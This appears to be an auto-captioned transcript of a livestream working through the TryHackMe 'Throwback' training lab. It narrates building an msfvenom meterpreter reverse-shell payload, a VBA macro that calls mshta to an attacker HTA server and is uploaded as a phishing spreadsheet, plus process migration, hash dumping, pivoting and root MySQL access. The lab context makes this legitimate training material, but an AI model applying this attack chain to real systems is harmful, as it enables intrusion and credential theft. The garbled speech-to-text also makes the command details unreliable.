hey, this is the time-keep program That's another option and that We could probably use the Tag is oh true netcat We'd have to do like a stupid get thing though What is the what is the raw? netcat Like what is the raw http get requests? I genuinely don't know at the top of my head. It's like http slash one get forward slash or something Uh If I do this on 10 200 two 84 183 was the Was 183 the firewall 138 I was super close Can't you get it from power shell from the sheen you already have on the domain? Uh, maybe what are you envision? How do how is that a quick one-liner thing in in? Like power shell that you're thinking is that how it's done? Http get request domain dns I'm not understanding what you're thinking. Sorry Yeah, you did an extra new line in there grep title incredible cat internal hosts while read line do Echo the thing into the thing on that internal host Grep for title and do the done Some of those might fail So let's do a timeout one second And let's echo the line each time that we do that Why power shell resolve dns name 10 point? Oh Oh I now understand Relatively what you're saying resolve dns name 10 224 117 Does that do a thing throwback? Oh, it gives me a little name host. Okay Cool And now I understand So there are a few of these 79 Can I supply multiple here? Or is that going to be weird? Yeah I could do like a while loop if I wanted to but And this might take a little bit You can dump 80 dns from a regular user commas in between. Oh, yeah, I guess where that that's where they try to We'll do that after this one if it comes back We'll see if this one will respond. No Do I need to set like a domain name or a domain server for the thing to use rather than just what it's already using Trying with commas that didn't like that 176 The dc it responded Yeah, ooh Nice Okay, very cool That found throwback time throwback time is 176 We got it So What the heck is going on on that thing? I would need to be able to access that through foxy proxy So I do need to Use the socks for proxy And the proxy server is running. I can proxy chains curl That ip address and that will work So if I am doing it within firefox Will that work it does nice? Oh, that's awesome Cool, I actually haven't been able to do that before like I've done obviously a decent amount At least somewhat amount of pivoting and auto routing and port forwarding and socks proxy stuff between a lot of the elurne security certifications But funneling it through foxy proxy is is nice because you can actually see web pages With this in mind We do know that we have access to the Change password functionality and we saw that in mail and I think we saved the Yeah, we saved the url. So let's actually add this into My It's that rehost file. So you don't know it's that rehosts And we have 10 224 176 With timekeep throwback.local So now I should be able to go to That location and it will load just fine and back in sublime text We have this and I can get to murphy or specify a password just like that Like literally making the get request. I think we'll change the password so Before I do that, I want to make sure that's really what I should be doing yep From the email we get the link is a virtual host the timepiece server to access it. We need to set our etc host file great I've done that After updating our host file, we can navigate to the link and reset a user's password. What is the host name of the device? Throwback time. Is that what you mean? yep What is the Title throwback hacks time keep Throwback hacks time keep Dunzo What user was the passive reset for oh, they did it for murphy f We got it cruising through all right After doing everything that you can do with your initial footholds Didn't we just read that exact sentence? Yes, okay Word to your mother I don't know what that's from other than mother the video game right here From what I understand earthbound. Is that right? Ness and Lucas after doing everything you can with your initial foothold your team thinks it's time to look at the resources and services We've opened while moving to the network Part of this question will require a valid credit card or debit card or access to excel excuse me What? What why you need my credit card? Picture this you're a manager for one of the top accounting firms in the united states As you walk across the floor you notice one thing in common every device has the microsoft office suite installed This shouldn't be any surprise to you as reported in microsoft 2019 in a report office 365 has 180 million users For an attacker. This is extremely large attack surface as an attacker. All you need to do is get one person to click Oh skid. Hey, what's up? Hey skiddy. Yes, I realize okay. It's saying you need access to excel Uh, and I should be able to downfall of an organization Not my actual cracker. I follow. I'm I'm good To start we'll cover creating a simple macro And this scenario will be using excel after that we'll move on to creating a malicious macro So I have been doing this A little bit Uh With e c p t x or the e-learn security penetration testing extreme so and I've been doing that on my Other machine here because this is my x1 carbon Think pad Lenovo thing So that's running windows and I was able to get excel and powerpoint and stuff on that and I've been using lucky strike Because I was exploring I would tinker around with like doing visual. Oh, thanks. Yeah lucky strike bowling I get that lucky strike github or whatever And there are some guides and documentation for it but I've been doing some visual basic stuff to be able to figure out and learn how to write one of the macros On my own and have some fun with it But I also just take a look at lucky strike which we'll go ahead and like Create and put together this macro for you It sounds like you can just as easily do that with MSF venom as this suggests and recommends so if it's totally cool with me skipping down it says here If none of those options work for you scroll into the section to generating macros with msf venom Let's we might do that. I'm running linux, obviously So I don't immediately have access to excel on this machine specifically I'm just kind of reading what they're using here though Starting up a power shell command So let's say we want to step it up a notch and require the user to not interact with the macro to trigger the remote connection Is this possible? Yes, easy next question Am I going to switch to z shell anytime soon john? Yeah, I'm doing it right now obviously Why didn't you say so earlier? Oh god, I don't want to do this thing Yeah curl a completely arbitrary random online web location Z shell sudo apt install z shell There you go, this is prime twitch chat taking advantage of the ability to completely distract the streamer at any point they want z shell z shell Check it out Now i'm running z shell. All right, sweet back to what we were doing All right, we got john to install z shell now. It's time to do some binary exploitation We'll do some like fun romp emporium after this Yeah, I should get oh my z shell and make this a lot more pleasant than just the random weird percent prompt But we're doing this right now We're learning about visual basic code to write malicious macros Uh, we're gonna press the i believe button on this because I know that I need Microsoft office and that is on this other machine and I would set up like remote desktop or Like some vnc thing to be able to do that, but I don't have that set up right now And I don't want you to be bored Not being able to see that so They're using a msh ta the html application Generating macros with msf venom alternatively you could just make msf venom do this whole thing for you Yeah, uh, I think I saw someone make a little poll request for using the stabilized shell scripts from the poor man's pentest Um, it's you just need to put fg and the stty raw minus echo commands on the same line Separated by like a semicolon for some reason. That's what you got to do to get uh, you like your netcat stabilized stuff to work but uh okay So All you really need to do is create a malicious macro with the vba format Yes, jackson. This is saying keep this in mind. This only creates the visual basic strip code Not the macro like the macro code not the excel itself Yeah, oh sweet. Good call Venom and yeah, is the uh, all my z shell column in row size. That would be very good to have Do I need to be able to have excel to be able to do this? right now I guess I can like go install Microsoft in the virtual machine that I have but like when we tried to open up the virtual machine the last stream and video it was like whoa It like it wouldn't load a darn thing So we can try it and I guess I'll Fire up this machine that's beside me Oh, no Hey welcome abdud a dubs Forgive me for not knowing how to say your name I don't know the easy way to just go ahead and turn on Terminal services for this other machine that I could connect into But uh, it would be at a different resolution and stuff would just be kind of funky. So Let's not do that. Let's see if our virtual machine will behave And let's find out if we actually even need to do this Optional welcome back Yeah, we're gonna figure out if we can do some macro stuff because Sure, we could make msf venom create Like the visual basic script, but I still need to package it and do an excel file And I'm on linux so I I've done this and I do this in ecptx Or the very very start of the e-learn security penetration tests are extreme What web server accepts xlsms as file up nodes? What what did we talk about web servers whatsoever? Okay, where's this coming from? Oh, I didn't log in to timekeep. Yeah Is that this thing is it throwback? time Yeah, fine. Thank you. Appreciate it. Jackson was We should set murphy jay's password to password Thanks, and I got a flag All right, let's keep that in mind Put it in the read me here I don't know what number this is. So let's go find out real quick before we Before we go crazy Throwback time is number 10 so save that and We don't need lucky strike now we go ahead and log in with murphy F with all caps password as our password incredible So we can upload a timecard Pardon me wants to save this password. So I don't forget, but This is a link And we need an upload timesheet dot xlsm okay Looks like that is what I should have been looking at for this next session What page is the file upload in? That is in time sheet dot php What is the name of the xlsm That you can upload timesheet dot xlsm Incredible do I need to go ahead and make this thing to get onto the box Yeah It looks like we do okay So let's try and make this excel file. I guess Let's get ready to install microsoft office in a virtual machine. All right Excel painstakingly slow windows Virtual machines Microsoft office Yeah, he's like oh boy strap in boys. This should be fun This is moving at a 10 frames per second The virtual machine is Please scroll down I'm moving my mouse to scroll down Can I just download it please? Or is there a download button? Buy now Buy high Sell high Perform business transactions while high That's a joke that we say a lot Yeah, this is the equivalent of running hash cat on the xps. It's like no We're trying to run a windows 10 virtual machine exactly I just want to download link Frequently asked questions. Where's the download? Is it because i'm on google chrome? Will it only display if i'm running edge? Get office no no no go back go back. I want to get office button And I want to actually be able to get office Jackson this is sending along. Hey, I didn't try this earlier But if you want to give it a go this looks like evil office, which we'll be able to create an xls or excel file with a macro Do is does it have any examples like a doc x file or anything that I can just put stuff in No, it doesn't look like it I feel like this would work, but it looks like it needs to have an original doc x file I mean I can just like find something like Look at anything on the internet and just make a regular doc x file, but You took me back to the exact same page you were on earlier am I I'm glad we're doing this as a stream because I would hate this As a video or i'm like i'm just Functionally not functioning right now You can use excel online for free Genius excel online I don't need to do that in the stupid virtual machine excel online Or maybe like google Would be able to do it You can tell it's excel because it's a grid What is happening? No, no, no Everything's no Just give me office excel Yeah, google docs can probably do it We're going We'll do macros in the online version. I don't think it will but we could download this excel file that it will give us And then we could pre-plan it in with that uh little evil office Maybe like as an option Yeah, just download the xls file book one the holy book one dot xlx What was in that downloads folder was there anything sketchy Making sure they're not Make sure there was nothing bad as I open that up This is uh The risk of me doing a stream right is that uh when I open up my file systems of like my actual machine There's nothing weird This is a picture that I made To invite my friends over for a weekly friday a weekly pizza friday get together So It was a good meme. It was a good joke. We had a great time. Yeah Tell your friends Come on over for pizza friday Yeah, yeah night wolves like whoa That looks great john. You're an artist All right, we're doing track me that's what we're doing Enough enough distractions Let's do uh like a macros folder. Let's slap that in there Yeah, I'll tell everybody excel so Now I'm using z shell to make everyone happy, but I'm no longer to make myself happy Uh, we'll go into that macros directory and we'll use msf venom with the payload Oh, keep in mind. This is not an xslm file You're right It's crippling Can you save a copy to one drive? Can I like change the file format xlsm is just one with macros enabled? Is it not? macro enabled spreadsheet Can I just like Enable macros and then change it? data Where do they put those? insert It's probably not going to work in the online one honestly Solution is to run windows at all times download excel Go to download I don't want to buy it I just want to download it No, I don't want to participate in your surveys Try one month free I'm pretty sure I actually bought it already earlier Like while I was doing the course for ectp ectp tx I was like, yeah fine, whatever Take my money microsoft so I can run A singular attack. Yeah, thanks krillix I see we're making john suffer again Does ubuntu come with open or libre office? Uh, it should come with one thing This offer is for new customers only. I don't care Can I download please? Yeah, you aren't sorry So we have a libre office calc Will that be able to like save it as a xlsm Oh my gosh It can Theoretically it can save it as an xlsm file. So I'm going the wrong directory because I am having a lobotomy From my inability to make an excel file Excel Do it. I don't care use that format Move that bus ls rm excel.x File excel microsoft excel 2007 Theoretically with macros enabled We're going on uh We're we're kind of going on a trip here We're kind of really rolling the dice to see if this evil office thing will also even work for us So proxy chains you don't need anymore. Oh, that would probably that probably had some cool output That would have been good for me to look at but the it's over now. So And I don't need that htp server over there and I don't need that shell. So let's kind of Move this a little bit And let's hop over to opt and get clone evil office Let's see if we can get this to work python 3 That's a number two Evil office what why would why why would you even have that? If you have evil office if you have windows you would need to use that tool Are you just are you just checking that with like os? No, you're good. You're good. You didn't know That's not like any of us actually read the source code for the open source project that we're looking at on github. It's okay Yeah, yeah, yeah can I just Make a macro in librae office Internet will librae office Macros run on excel macro Yeah, I would I would agree I would I would think that this probably wouldn't work Worth a try But I guess we'll just continue to flail around aimlessly on the microsoft website And try to download this office.com. Oh my gosh It's an actual install button Will it do it? Install office on all of my computers. Give me them all Put it on my android phone Don't actually Yeah, dude, absolutely vantaman if you want to pull request that absolutely Install all of office Isn't that the only way to do it? Is there there's no Someone someone Is there just a only get excel option? Please That's the thing I feel like you have to download the entire gosh darn package We're gonna again. We're gonna again spend another hour and a half just waiting for now office to install While this is happening I could try and vnc into this other machine Or get like team viewer or something installed on this shit I think you can yeah, I can just rdp. Yeah I need to enable it Remote desktop settings enable remote desktop confirm Did he do it? What's the ip address here? Close close close close close close all windows on the separate computer that you can't see Close close close close Keep going office. You keep trying to do your own thing ip config My ip address let's see if that'll work Let's do the reminisce See if we can rdp to this guy I accept And That needs an initial Why? That user is fine that user is allowed Yeah, just a moment just a windows moment That's a thing It's like crippling for me to work And a windows thing and I mean I need to obviously practice and get better at it, but it's like I should have a windows ready environment, but And that's why I like literally ran windows on my machine for a little bit because I kind of wanted to just have it and get better at it And do wsl things But that didn't work I mean it would just kind of be It would hinder anything else that I actually tried to do that was relatively somewhat interesting Do I need to like reboot this after I've enabled it for some reason because it's windows? Yeah, yeah people that are watching the previous video are like cool. This is perfect I actually have time to watch the other thing This is going to take an eternity Yeah, I feel like a normal a normal thing would be I guess normal people would run windows as their host and then their linux vm on In vmware But I just dislike that because I had just have a much more better experience on linux and I just use that Natively or I try to anyway I'm gonna make sure this is the same IP address real quick It gave me the like let's finish setting up your device and then I got really concerned Like did you just re did you just revert? Did you just like uninstall everything and reinstall it windows? Like I don't trust you anything Well, our virtual machine is slowly installing office Or downloading office. It's still going to take an eternity to do that so another thing that is an option is using like my elgato to try and uh Get the screen capture of this device into the obs screen recording But that's janky man Fun fact, you can't rdp to local host It does not let you I just wanted to test it Enable remote desktop is on keep my keep my pc awake for connections when it's plugged in Uh make my pc discoverable Let's go to advanced settings Nope Do I need to like open that firewall port? Use the pc name To connect to it Hmm Let me at least kind of look on Oh no, no, I mean if Don't like feel sorry for me. I mean, I appreciate that I'm just trying to Scramble to think of a decent way to do this without making everyone like sitting agonizingly waiting and boring benefit And drawback of doing a real-time stream office is going And we should have it on my virtual machine realistically I've been using it on that other machine here, but I don't know why rdp just like isn't letting that happen. I don't know Let me They're on the same network You're open, man Well, I am Where's my actual 98 98 yeah So why did I why was my name repeatedly in my prompt here? Let's tune in on our windows machine They'll be done in just a moment. It's done We're gonna have to snapshot the crap out of this We're past the two hours guys. I think we uh I think we would have gotten our achievement At this point recently added excel. Oh my god Is now the time Is this really when it happens? Have we finally come this far? All right, we got the excel What a time to be alive Before I do goddamn anything. Let me take a snapshot Installed microsoft office With four f's because It's gonna be a little bit of slow. Sorry So Let's Get this Vd is this msf venom thing rolling on Let's hop into the macros directory and Let's do our msf venom tack p windows meterpreter Reverse tcp we'll set our lhost to equal ton zero. We'll set our l port to equal What do we want? What what yeah, my machine does not like snapshotting really sorry about that What port guys? We're doing some quads 4224 that's the first one I got It's happening Now we just specify the visual basic script as macro dot vba Go And I could use tack o Oh, you would use the hta server? Oh like instead of meterpre Oh, so that way we could kind of like get back to it really smartly. Can't we? Uh, you guys covered that didn't you? Hmm hta doesn't get picked up by antivirus men if yeah, it's true and I said venom's gonna get like crapped on That's a good call so Let me Justify myself and just slapping this code here This is going to end up creating a macro right sub will be a sub routine or like a process or a function Um that this code will run this visual basic code will run auto open We'll call that sub or that sub routine that function We've already defined that and we'll be creating a new process running shell We're returning the process id and we'll use msh ta or kind of the microsoft html application interpreter for hta stuff Uh on an hta server that metasploit will configure and work for with us c949 etc etc I'm getting pinged on discord So with that said I have no shame copying and pasting this We do however need to go ahead and create that hta server. So We've got our metasploit stuff running over here. Let's use hta server Now we've set that up We can show our options we can Set l horse excuse me l host 2 ton zero set l port to 4224 I suppose Um, what else did we have in here? That's kind of it, isn't it l horse? I'm glad you guys like that Get out of here actual virtual machine now that you finally have Uh excel and that's all that we do That's literally it Set up the hta server And make it ready to rock Okay Run Now you exist here So Let's make the macro Ourselves They use auto open here We need to make Our ip address be what that's actually reaching out to So we'll slap that in And The code that we had used was just a sub There we go And msh da will just call out and run that so Now we've got that visual basic script Now we need to wait. Do we need to modify it? Do we need to change this whatsoever? The one that msf venom used I don't think so like ours will should should just work. It's simple and stupid and easy because it's like four lines But it'll work on it. It's worth a try sorry I'm responding to uh I'm responding to messages on the discord was getting distracted Yep, new green screen. We fear it's worth a try be kind of fun to see how it looks And it's kind of fun and cool with the chat up there. So Um, now that we have this visual basic script, we will want to create a new macro thing So it's under data Insert insert insert macros I can't stand dealing with excel. I'll be completely honest Let me just roll back to kind of where this all was Creating a simple macro create a new work group work book and head over to the view tab view macros Now I need to uh Create a new one What do we want to call it? We'll call it macro Use LibreOffice. Well right now we're doing this to make a little excel Macro that we'll use for phishing What happened? Okay, hello world will be the name of our function that'll invoke mshta. We'll reach out to our interpreter hta file and Creative i'm glad you really like that macro name. They called it my macro. I'm just not trying to be as possessive Slap it all in PowerShell invoke to download We don't need to do that We do want to just use the mshta to grab it and run it so Return of the macro good jokes guys. You guys are you guys are crushing it over there. It's a stand-up comedy show Okay, I think that's all we need Is that not all we need? so I'm just gonna do it Is there a way to save this as like Let's let's try a proof of concept. Let's see if my victim machine will be able to get it um Time sheet Dot xls m with the macro enabled one done right So at that point I have This machine running over here I have this mshta server started I can see that with jobs mshta server he's running He's waiting to catch some good stuff there. So far to open this up I Need to activate excel. You shut your gosh darn mouth I don't want to activate excel Can I x out of that? Oh my lord windows John makes me sad. He hasn't laughed at our task titles yet. The x. Yeah, this x is trolling me This whole button is trolling me. What the heck? All right, now it's gone. Now it's gone. Uh, I want it to run the macro though Hello mshta is that microsoft html application It has a better word for it. Uh, there's an actual thing mshta Windows to execute html applications Microsoft html application host Should this thing run should this thing kickstart? There we go macros have been disabled. I don't care do it enable content Microsoft office has identified that this is evil You suck defender You suck I'm trying to be evil Should we just like fire this off? Should we just send it to them and see if it'll work? Oh, man Who are we sending this to? We got our malicious macro. We got our religion. Oh, no, we're just uploading it. That's all we're doing And it's got to be timesheet dot xlsm full send full send send it All right, you convinced me Let's Remove that bad boy Let's use the power of virtual machine Guest virtual editions and drag this file over please for the love of god My gosh Transfer the goddamn file great Now I have to deal with this Now I have to deal with Getting the file out of this stupid virtual machine John's amount of tabs gives me anxiety. Look You know what I can do check this out if I hold down the control w button All of my problems go away. I don't know if I want to close collab cat though Because we might need him again as we tend to do Dragon drop should be a thing uh install Guest editions Oh my gosh. I really honestly thought That this already had that That's the thing. I can't stand virtual machines. You guys know Yeah, vmware honestly Would be the better option I used to use vmware. You guys probably have seen that in some in some videos I don't think I have a license anymore Please run Yes, god dang it email it to yourself Virtual box over vmware because virtual box is free What is going on? What is it? Is it uh vmware Works at vmware player vmware player is the one that's free, isn't it? Yeah use libvert and kvm Everything should be a kubernetes container running on the blockchain All of this just for a macro file exactly you got to do what you got to do Kubernetes blockchain is the future. That's right. I'm glad you guys are having fun. I love you guys hanging out in the chat Thanks for thanks for being here We got to do this more often What number monster is that I see uk devolk 19. This is still number one. This is still number one It's beautiful though because the green Is being eaten by the green screen Alrighty Let's see if we can please for the love of god transfer this file again now Yes, this is a task continuation from last night. So uh, we're doing throwback From try hack me and it is a long exercise. I don't think we actually have a ton left, but I mean we probably do Hello atomic blackfish. We are doing throwback from try hack me Change the settings of the vm I think it has both there. Hey, welcome everybody. I appreciate you coming to hang out Yeah, I could set up a set up a shared folder and I I always that's always a pain too, you know Bidirectional is totally fine. I don't know why I have three command prop windows that just open up for some reason Now can I drag this file over I so so wish I had like impact it or something Should we do this shared folder? Should we just stick and email it? Should I This is just agonizing guys. Oh extend lab time. Thank you. Thank you. Thanks for the reminder We still got oh, we still got an hour and 25 put it on g drive or something. That's an option From the top you get options for drag and drop In settings drag and drop drag and drop bidirectional It's still on Can I copy and paste out of the virtual machine into this? There's no way that's a thing Maybe it's like just this folder. Maybe Nautilus is like no, I don't want you to move those Why is this spinning? What the hell is my cursor doing? Yeah, acrylics. Don't worry those command prompts are just me and my c2 agent That's me running star killer At least you guys are having fun Oh shoot. Yeah, maybe this has uh Maybe this is any running actually running ssh right now. That's a good call Did it it didn't copy it? How do I make sure that ssh server is running? How can I make sure that I can actually ssh into this? Yeah Just just echo it into base 64 and then copy and paste it 10 0 to 15 We're gonna get this We're gonna we're gonna rescue this poor machine This poor excel file. Here's what we'll do Create a new folder 10 to 15 is not it. Oh, you're Yeah, this is true. This is true Right out the file by hand Can I make a shared folder? I guess I would need to change the uh Like network settings for that. Would I not? You're right. This is knadded. So Let's go bridge I don't give a shit Give me a new ip address, please Please please. I don't want ipv6. Thank you. Thank you. Thank you SSH this gosh darn thing is ssh even a thing Yeah, I need to install like python on this thing. I'd love to be able to spin up the like Python HTTP pp server with upload and download enabled Share share this folder Anyone can access it Is everyone like a thing? Share Yes Great You can email this or copy and paste the link Uh Uh paste Hello, hello Paste please Okay, that's a thought Now let's do smb 10 000242 John With my password Would that work? Oh my god Am I still john h on this thing? I think username has to match the email like The stupid windows account email Why is that a thing? There's no way I don't get it, dude Honestly, don't Yeah, who am I would work Who are me? Just john h dude, literally it put it on a flash drive This is hell What have we succumbed to? Dodge slash john Why would that I don't know would that work? Yeah, it is a local account No, no, no Can I fucking install python? I'll do that shit optional features Is that how to do it in windows? ssh, please It's installed Do the thing snapdrop.net That might do it too I'm gonna try this uh, I'm gonna try this ssh gimmick again. I actually hadn't seen that like Forcing it to turn on Yeah, file.io would also be fine And the suffering Why do you have to install open ssh? I thought you just had it, man You tell him Usb would work Sort of python ftp sir realistically this goddamn machine should have python on it So let's do that while ssh is doing its thing Hey, check this out on the python web page. There is a download button on the very very first page Unlike Microsoftoffice.com Yeah, that's just true. I am just installing the client So I might not be Doing it right Hold on. Yeah, just compromise my machine krillix I don't know what you're waiting for everyone has been saying end the suffering Hurry up and install python save us save us our holy save your python Open ssh server is now installed. Is that a thing like is it running? Can I ssh locally? How do I start it? How do I I need to censor myself This is this is the the hysteria limit. I'm almost at now Is it literally it's not services on windows is it? What No, uh Something crashed behind me What what what was what is what is this ubuntu thing? Okay, whatever whatever ubuntu That's fine That's fine python hurry up man I need to add sshd The internal server error is just me SSH Open ssh server Run always Start now and now python's done installing It's probably not on my prompt yet. Is it probably not Okay windows What's kind of what is what microsoft share? What the hell are you doing? It's a ssh local host. Yes Oh my god After all this time Will it work on my host? Yes, yes Now I need to use john h specify a password Excuse me That's literally the Is the microsoft pin Is the is the windows pin different from a regular password? Or is it just A jawn that I need to use What the fuck What the fuck I will absolutely do A stupid as password We'll do a little throwback. Yeah It's uh net user john h throwback Excuse me Open it up from the system prompts This is agonizing Okay, I'm done with this. I literally I'm just gonna go to the python method. I'm so sorry We've wasted so much time together I've grown like 30 years in age. How is this? Managed I just want to get to like Environment variables, please Can I just Get advanced settings? Please system properties Your pc is monitored Incredible Does it just show up in the star button if you search for environment variables? There it does It sure do Okay path Dear god program files Where the foop is python right now Nope It's in program files python. No, it should just be in c Where the fuck we're in python install to We see windows. What where did we tell python to install to? Is where a command in windows? Oh shit it is What the fuck So python does it is it isn't my path What? I can't do this much longer This is I'm at the end of my rope right now We got to get out of this We have to we have to get this stupid freaking excel file We literally installed python Is it not there? Right now we're just trying to get a stinking file out of this virtual machine Because virtual box guest editions is just Not Letting it happen Oh, does windows have an fdp client? That's a thought What is a quick uh Does it just type pi? What the hell Man, thank you so much What the heck All right, let's get out of here Let's get out of dodge, dude. We're going to john h We're going to the desktop We got our we got our stupid Share folder We got I don't know. That's a timesheet.xlsm. Okay, great. So now let's pi tack m Http.server please for the love of god. Give me a web server Okay, okay. Yeah allow access on the firewall totally cool I was I was tweaking out because running python opened up the microsoft store Oh That's not python Okay firewall Can you go away now? What the hell? We're here. We're here. We're at the home stretch. Oh my god It's finally happening We're gonna do it It's done 48 minutes Oh my god This should never ever happen Wow Remember how we uselessly wasted time trying to run hash cat Now we've uselessly wasted trying trying to rescue a single file out of a virtual machine I'm glad you're crying because I'm crying too Holy cow What now? Where do I even go at this point? We got to get back to fucking timekeeper Log into this If I drop a few more swears now, I'm sorry Oh, it's password all caps Because that makes it more secure full send Full send everybody Is our is our menisploit thing still running? Do you think this will even work? Is it supposed to work? Please stop swearing CTF Try hack me We know that this is going to be wrong like there's no way that this is over Upload the thing Okay Your file timesheet.xlsm has been uploaded in ministry. We'll review it soon So in that xlsm file we added a macro that would connect out to an hta server that is running on my machine On port 8080 Right Is that right Or did we type 424? Did we have the wrong port? The listener is running I mean I ran run. Yeah, he's doing its thing He's got a running session, but Now I'm a little spooked Oh We got one Got a fish Oh my gosh It's done Oh my gosh 35 minutes. I'm in. What a complete waste of time That's right Krillix You gotta you gotta overreact And make sure it's fun for everybody Now my meterpreter session is about to close isn't it? I know how to do meterpreter things. I think I hope so Yeah, oh, that's true. Let me uh, let me very very quickly make sure that we have Time we got four minutes remind me in four minutes chat to go ahead and add some more time on our network We need to be in a system process So we need to migrate to a new process Who am I right now? I should be I am a local administrator. Apparently that's awesome. Okay. I like to normally migrate to like win log on Because I know that's a big boy So let me uh migrate Tag capital n to win log on dot exe and let's see if that succeeds Fingers crossed Cool. Now I should be able to run hash dump And I got a lot of hashes. We got peanuts account. Nice Yo Pyrute We need to make a new folder Let's move into uh Hosts and make a directory for timekeeper I should do this in cherry tree and honestly like as I as I went through this more and more and especially as I was thinking last night I was like, dang uh Yes, the amount of readmes is kind of insane and unreal especially because uh Which we need time we got timekeeper and that's the one that he's asking there What's users hash? What is the user's hash starting from the third colon? So first colon second colon Do you mean like the entire rest of the string or do you mean like The absentee thing. I think you want the one after that like the actual hash That yeah, what is the administrator's hash starting from the third colon? That's this guy What is notion? Maybe we'll find credit card numbers to pay for our excel. Yeah What is the user's cracked password? um We could Hash cat it again if we really really wanted to whoa I feel like crack station should be able to solve this one Yeah, do we still have our goddamn collab cat? That I closed while literally saying I probably shouldn't close this. Oh, thank god Maybe pentest ws. Yeah, no, that would be a good one too. Oh you want me to use notion. That's it. That's another good one Okay We can check that out nice We're getting close I'm gonna be doing some database stuff. All right sequel Now that we have foothold on the timekeeper server we can Being to enumerate what information oh begin we can begin to enumerate what information we can find from the server We can assume it is running a sequel database somewhere because it had a login page We can also assume the web server is running exempt from the sequel and slash holder within the local disk With this information we can easily find where the sequel database is stored and how we can access it Now we're going to deep dive into a little bit of how my sequel and the sequel database works. Yep Everyone's yelling at me go ahead and add more time Success Sorry, you just got a profanity warning rule as john dropped 20 f bombs I'm sorry Oh, sorry Thanks Shilpoi if you chipped in for a VMware license. Thank you so much I don't have any of the cool like bells and whistles announcements for Like bits or things and things For twitter. I need to uh, I need to get better at that. I need to get that started Uh one moment. I am being requested to go do something so Please forgive me I need to drag this window up put the children to bed Do you stream on both youtube and twitch simultaneously? Uh, I don't think that is something that their terms of service is cool with Uh from what I understand I am gonna ask for uh a bio break also in just a moment As soon as I am done with What I've been tasked to do Now I'm getting more discord notifications Roger okay Now let's do a really really cool stupid, uh Background thing. Let's let's install sl Obviously, this is important Let's install steam locomotive Add more time to the box. Did we add we already added more time? I think we're good. I think we're good Now that we've got steam locomotive. I'm gonna do something different We're gonna do something other than yeah. Yeah matrix. We could do that in the locat We get a lot of good stuff in line. We could do sl for steam locomotive. I think that one is extremely important and then We'll set a new sublime text window that'll say Be right back In three to five minutes This is perfect. This is perfect Let's set The transparency here And then let's do a little while one Do sl and like sleep for like a tenth of a second so hopefully I can still control c out of it perfect perfect Hold this down a little bit Okay, great Be right back three to five minutes make that the full screen Oh, I got it's got to go down one line. No, it's perfect. That looks great All right, everybody give me a little bit of time. I'll be back in just a little bit Thank you. Thank you. I love you What's up? Hey everybody Thanks for uh, thanks for sticking with me. I'm glad everybody's still still hanging out 50 of you guys. You're incredible. I love you so much Thanks for the welcome back Gotta wait for this this L command to finish. All right control c out of this Fantastic, uh, and we don't need that tab anymore Okay This is the real John you can tell uh because what is going on with that stream right now Oh, it looked really funky. Is my stream just dying currently Is that just a twitch preview right now? Or is the stream going crazy for everyone else too? Okay, it's good on your machine Maybe my chrome session just like gave up. Oh, no, okay. It looks all it all looks better now. I'm sorry. I just had to Refresh the page Sorry about that You do the sanity check You can tell it's me because as is uh as is the norm As I come back from another break. It's time to crack open round two of the monsty. So We're going all in We're going big Let's get back at it Uh, I'm gonna change this profile back to what it was And my interpreter session on prod died great That's fine. I don't need prod currently Where we at doing some sequel Regular sequel And now we could work with this machine Uh, let me go ahead and do that evil win RM to get into it or ssh actually Can I proxy chains ssh into this machine? 224 and we are on 176, right? Looks like we need to specify the user as timekeeper And did that have ssh? Does it have evil win RM? This session suggested now that we have the hash Ssh and to throw back time I just did And it didn't like it 10 24 176 Oh I needed to use prod I needed prod Dang it I needed prod for my uh For my proxy Because that's what I was proxying out of Let's reset that back Uh, we were working with Peter's j And he is password was throwback 317 Gotcha Okay Let me resize that again So you can see here I still am in this directory and I no longer have my met So I need to go redownload that Where did I have not a shell? It's an interpreter Okay, so let's let's bring that back up Python to HTTP I think I already had that server running over there. So let me kill that And my p address was 10 20 10 10 50 22 5 Gotcha Okay HTTP Uh, actually honestly, I should probably put this in A normal location that's not going to be cleared Peter's j Gotcha If you want to change your nickname, yeah, yeah be John Hammond 011 level up I am in power shell. So I can do a wkw get command as an alias to Invoke web requests. I am 22 50.5 50.22.5 Yes, 8,000 on not a shell dot exe And let's tack. Oh that to met dot exe Okay, thanks for hanging out piece dude. What other jobs do I have run? Do I still have that? Uh No, I'm not. I'm not. Okay. Let me go back to use multi handler And then set my payload to what it should be Interpreter reverse tcp. Yep Uh 10 0 And that was four two. Oh shoot four one four one Oh god, I don't remember I think that was it. I really hope that was it Met please please interpreter Yeah, I'm on prod. Okay. Good. Good. Good. Good So let's use auto route set session four And set the Subnet to 10 224 zero slash 24. Hey, welcome. What's up? What's going on? That should be good I think that Jobs is still running. So Can I ssh now properly? Yes. Yes. Excellent. I can and his password was keeper of time Awesome. Okay. So now I'm back on the box I'm doing okay. I'm doing okay. I'm doing some try hack me Uh throwback and it's a lot of fun So now that I'm back on the box of timekeeper with a real regular command prompt shell not just meterpreter It's good to have meterpreter But now it's good to have this actual shell so I can go into exam And take a look at that my sequel that we got here. So that's in exam dir sorry i'm not in uh And my sequel is the directory there So now I should be able to just run my sequel. Oh, no, it's in bin. Is that right? dir Is there a mysql client? There is mysql.exe excellent And do they have credentials for this already? I can hear oh, oh, oh from here We could try the password that we got from throwback workstation 1 when kerber roasting the sequel service account We did get that mysql password during that and that we know is a service account That would authenticate with this service. So tack root tack p And paste that guy in I didn't paste him in paste that guy in awesome. And now I have access to the database I'm in a command line interface for working with my sequel. So Regular enumeration. I could show the databases that are prevalent here and I have Domain users, which is a peculiar database pets test and time keep users Uh, we're probably going to want to go check out the domain users page Oh great. We found pets What database are the time keep users logged in as? They are in typing users What database are the domain users located in probably domain users? Uh Domain users Domain users Did I have a typo there? I probably did and I just didn't realize it. So What table was located in the domain users database? Let's go ahead and use that domain users database and then let's show tables to see what we've got here Looks like I see users super easy. What is the first username in the table? So let's select all from users and see what we've got There's a flag in there Clemson's d Oh, I'm sorry. I did I had domains users. Thank you I realized my typo submit that flag I'll do it I'll do it Let me jot this down real quick good And I'll bring this up to task four when I get my flag submission panel Uh, what is the sequel flag on throwback time that is number 12 Uh, oh, there's a root flag on that on that page let me 12 goes here Let me move this up Did I have 11? Oh no, that's uh, that's the root flag um, I am In there is meterpreter on time. So let me interact with three In my metasploit session and I am a user administrator. Oh, I'm actually system. Yeah. Okay fantastic So under users, I think I have an administrator User account I can go in there and in his desktop We should be able to find a root dot text, which I can go ahead and cat that out awesome And we should go ahead and submit that for 11 Let me just Note that in my read me Grab that prompt here Great Okay Um, now let's get back to where we were a lot of scrolling We're done with that 